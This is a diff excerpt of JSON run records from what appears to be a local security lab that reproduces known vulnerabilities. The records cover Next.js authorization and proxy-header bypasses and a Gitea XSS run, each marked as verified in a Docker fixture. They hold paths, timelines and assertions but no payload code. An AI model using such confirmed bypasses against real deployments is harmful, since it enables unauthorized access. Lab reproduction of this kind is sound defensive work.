+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json"
+      }
+    ],
+    "browser_refs": [],
+    "browser_evidence": {
+      "required": false,
+      "present": false,
+      "refs": [],
+      "baseline_refs": [],
+      "proof_refs": [],
+      "baseline_title": null,
+      "proof_title": null,
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:29:13+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "nextjs--CVE-2024-51479"
+      },
+      {
+        "at": "2026-03-18T01:29:13+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "nextjs-authz-bypass"
+      },
+      {
+        "at": "2026-03-18T01:29:13+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:29:16+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:29:16+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:29:16+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:29:16+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:29:16+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:29:16+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:29:17+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:29:17+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "nextjs-nextjs--CVE-2024-51479-20260318012913"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "server-side authorization recheck was bypassed"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:29:13+00:00",
+    "finished_at": "2026-03-18T01:29:17+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
+      "report_md": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
+      "timeline": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd",
+      "bundle": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/run.json"
+    },
+    "browser_links": [],
+    "container_links": [
+      "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
+      "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+    ],
+    "advisory_meta": {
+      "canonical_id": "nextjs--CVE-2024-51479",
+      "title": "Next.js authorization bypass vulnerability",
+      "summary": "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
+      "display_name": "Next.js",
+      "system_id": "nextjs",
+      "category": "frameworks",
+      "severity": "low",
+      "cvss_score": 3.1,
+      "exploit_status": "unknown",
+      "published_at": "2024-12-17T15:09:06Z",
+      "updated_at": "2025-09-10T21:12:24Z",
+      "official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f",
+      "secondary_source_urls": [
+        "https://nvd.nist.gov/vuln/detail/CVE-2024-51479",
+        "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b",
+        "https://github.com/vercel/next.js",
+        "https://github.com/vercel/next.js/releases/tag/v14.2.15"
+      ],
+      "aliases": [
+        "CVE-2024-51479",
+        "GHSA-7gfc-8cq8-jh5f"
+      ],
+      "secure_code_topics": [
+        "authz-server-side-recheck",
+        "proxy-trust-boundary",
+        "token-cookie-storage"
+      ],
+      "verification_status": "verified-real",
+      "verification_mode": "real",
+      "artifact_mode": "local-fixture",
+      "blocked_reason": null,
+      "browser_evidence": {
+        "required": false,
+        "present": false,
+        "refs": []
+      }
+    },
+    "profile_meta": {
+      "profile_id": "nextjs-authz-bypass",
+      "vuln_family": "authz-bypass",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Protected route is reachable only after the controlled bypass proof step."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed guest/admin route fixture for server-side recheck."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner performs local authz bypass proof only."
+        }
+      ],
+      "browser_assertions": {
+        "required": false
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
+      "Seed guest/admin route fixture for server-side recheck.",
+      "Runner performs local authz bypass proof only.",
+      "Protected route is reachable only after the controlled bypass proof step."
+    ],
+    "progress": {
+      "completed": 10,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "nextjs-nextjs--CVE-2020-15242-20260318012830",
+    "system_id": "nextjs",
+    "advisory_id": "nextjs--CVE-2020-15242",
+    "repro_profile_id": "nextjs-proxy-boundary",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "nextjs.proxy-boundary",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json"
+      }
+    ],
+    "browser_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+    ],
+    "browser_evidence": {
+      "required": true,
+      "present": true,
+      "refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+      ],
+      "baseline_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json"
+      ],
+      "proof_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+      ],
+      "baseline_title": "Next.js Proxy Boundary Fixture",
+      "proof_title": "Next.js Proxy Boundary Fixture - proof",
+      "error_kind": null,
+      "reason": null
+    },
+    "container_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log"
+    ],
+    "request_log_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+    ],
+    "compose_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml"
+    ],
+    "timeline": [
+      {
+        "at": "2026-03-18T01:28:30+00:00",
+        "step": "select-advisory",
+        "status": "completed",
+        "detail": "nextjs--CVE-2020-15242"
+      },
+      {
+        "at": "2026-03-18T01:28:30+00:00",
+        "step": "resolve-repro-profile",
+        "status": "completed",
+        "detail": "nextjs-proxy-boundary"
+      },
+      {
+        "at": "2026-03-18T01:28:31+00:00",
+        "step": "doctor",
+        "status": "completed",
+        "detail": "all checks passed"
+      },
+      {
+        "at": "2026-03-18T01:28:34+00:00",
+        "step": "provision-compose-environment",
+        "status": "ready",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:34+00:00",
+        "step": "wait-ready",
+        "status": "completed",
+        "detail": "baseline urls ready (1)"
+      },
+      {
+        "at": "2026-03-18T01:28:34+00:00",
+        "step": "seed-environment",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:28:34+00:00",
+        "step": "baseline-snapshot",
+        "status": "completed",
+        "detail": "urls=1"
+      },
+      {
+        "at": "2026-03-18T01:28:34+00:00",
+        "step": "browser-replay-before-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:34+00:00",
+        "step": "controlled-attack-chain",
+        "status": "completed",
+        "detail": "steps=1"
+      },
+      {
+        "at": "2026-03-18T01:28:35+00:00",
+        "step": "browser-replay-after-attack",
+        "status": "completed",
+        "detail": ""
+      },
+      {
+        "at": "2026-03-18T01:28:35+00:00",
+        "step": "collect-logs-and-evidence",
+        "status": "completed",
+        "detail": "container_logs=1"
+      },
+      {
+        "at": "2026-03-18T01:28:37+00:00",
+        "step": "cleanup-compose-environment",
+        "status": "completed",
+        "detail": "docker compose down completed"
+      },
+      {
+        "at": "2026-03-18T01:28:37+00:00",
+        "step": "update-registry-and-reports",
+        "status": "completed",
+        "detail": "nextjs-nextjs--CVE-2020-15242-20260318012830"
+      }
+    ],
+    "success_evaluation": {
+      "passed": true,
+      "verification_status": "verified-real",
+      "blocked_reason": null,
+      "assertions": [
+        {
+          "name": "baseline-ok",
+          "kind": "baseline-ok",
+          "passed": true,
+          "detail": "baseline URLs responded without 5xx or transport errors"
+        },
+        {
+          "name": "runner-success",
+          "kind": "runner-success",
+          "passed": true,
+          "detail": "trusted forwarded headers crossed the boundary"
+        },
+        {
+          "name": "browser-present",
+          "kind": "browser-present",
+          "passed": true,
+          "detail": "browser evidence captured"
+        }
+      ]
+    },
+    "historical_status": "verified-real",
+    "latest_status": "verified-real",
+    "started_at": "2026-03-18T01:28:30+00:00",
+    "finished_at": "2026-03-18T01:28:37+00:00",
+    "blocked_reason": null,
+    "report_refs": {
+      "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830",
+      "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
+      "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
+      "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd"
+    },
+    "dashboard_refs": {
+      "report_html": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
+      "report_md": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
+      "timeline": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd",
+      "bundle": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/run.json"
+    },
+    "browser_links": [
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json"
+    ],
+    "container_links": [
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log"
+    ],
+    "request_links": [
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
+      "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json"
+    ],
+    "advisory_meta": {},
+    "profile_meta": {
+      "profile_id": "nextjs-proxy-boundary",
+      "vuln_family": "proxy-boundary",
+      "provisioning_mode": "real",
+      "destructive_risk": "low",
+      "cleanup_policy": "destroy",
+      "artifact_source": {
+        "strategy": "local-minimal-fixture"
+      },
+      "success_criteria": [
+        "Middleware trust-boundary proof is visible on the browser proof page."
+      ],
+      "seed_actions": [
+        {
+          "kind": "note",
+          "message": "Seed middleware boundary fixture with clean proxy state."
+        }
+      ],
+      "attack_actions": [
+        {
+          "kind": "note",
+          "message": "Runner performs forwarded-header proof against local fixture only."
+        }
+      ],
+      "browser_assertions": {
+        "required": true
+      },
+      "allowed_target_types": [
+        "lab-local"
+      ],
+      "required_services": [
+        "app"
+      ]
+    },
+    "reasoning_lines": [
+      "Seed middleware boundary fixture with clean proxy state.",
+      "Runner performs forwarded-header proof against local fixture only.",
+      "Middleware trust-boundary proof is visible on the browser proof page."
+    ],
+    "progress": {
+      "completed": 12,
+      "skipped": 0,
+      "failed": 0,
+      "blocked": 0,
+      "planned": 0,
+      "other": 1
+    },
+    "artifact_groups": [
+      {
+        "key": "reports",
+        "label": "\u62a5\u544a\u4e0e\u8fd0\u884c\u4ea7\u7269",
+        "count": 4,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.html",
+            "label": "report.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/report.md",
+            "label": "report.md",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/timeline.mmd",
+            "label": "timeline.mmd",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/run.json",
+            "label": "run.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "compose",
+        "label": "Compose \u7f16\u6392",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/compose/compose.yaml",
+            "label": "compose.yaml",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "baseline",
+        "label": "\u57fa\u7ebf\u5feb\u7167",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline.json",
+            "label": "baseline.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "attack",
+        "label": "\u653b\u51fb\u8f93\u51fa",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "browser",
+        "label": "\u6d4f\u89c8\u5668\u8bc1\u636e",
+        "count": 10,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline.png",
+            "label": "baseline.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/baseline-dom.html",
+            "label": "baseline-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-console.json",
+            "label": "baseline-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-network.json",
+            "label": "baseline-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/baseline-page.json",
+            "label": "baseline-page.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof.png",
+            "label": "proof.png",
+            "kind": "image"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/assets/proof-dom.html",
+            "label": "proof-dom.html",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-console.json",
+            "label": "proof-console.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-network.json",
+            "label": "proof-network.json",
+            "kind": "text"
+          },
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/proof-page.json",
+            "label": "proof-page.json",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "container",
+        "label": "\u5bb9\u5668\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/docker/app.log",
+            "label": "app.log",
+            "kind": "text"
+          }
+        ]
+      },
+      {
+        "key": "requests",
+        "label": "\u8bf7\u6c42\u4e0e\u63a2\u6d4b\u65e5\u5fd7",
+        "count": 1,
+        "items": [
+          {
+            "href": "/runs/nextjs-nextjs--CVE-2020-15242-20260318012830/logs/attack.json",
+            "label": "attack.json",
+            "kind": "text"
+          }
+        ]
+      }
+    ]
+  },
+  {
+    "run_id": "gitea-gitea--CVE-2021-28378-20260318012813",
+    "system_id": "gitea",
+    "advisory_id": "gitea--CVE-2021-28378",
+    "repro_profile_id": "gitea-xss",
+    "verification_status": "verified-real",
+    "verification_mode": "real",
+    "artifact_mode": "local-fixture",
+    "target_env": "local-docker",
+    "compose_services": [
+      "app"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json"
+    ],
+    "attack_steps": [
+      {
+        "kind": "runner",
+        "tool": "gitea.xss",
+        "status": "completed",
+        "status_code": 200,
+        "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json"
+      }
+    ],
+    "browser_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+    ],
+    "browser_evidence": {
+      "required": true,
+      "present": true,
+      "refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+      ],
+      "baseline_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json"
+      ],
+      "proof_refs": [
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof.png",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/proof-dom.html",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-console.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-network.json",
+        "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/proof-page.json"
+      ],
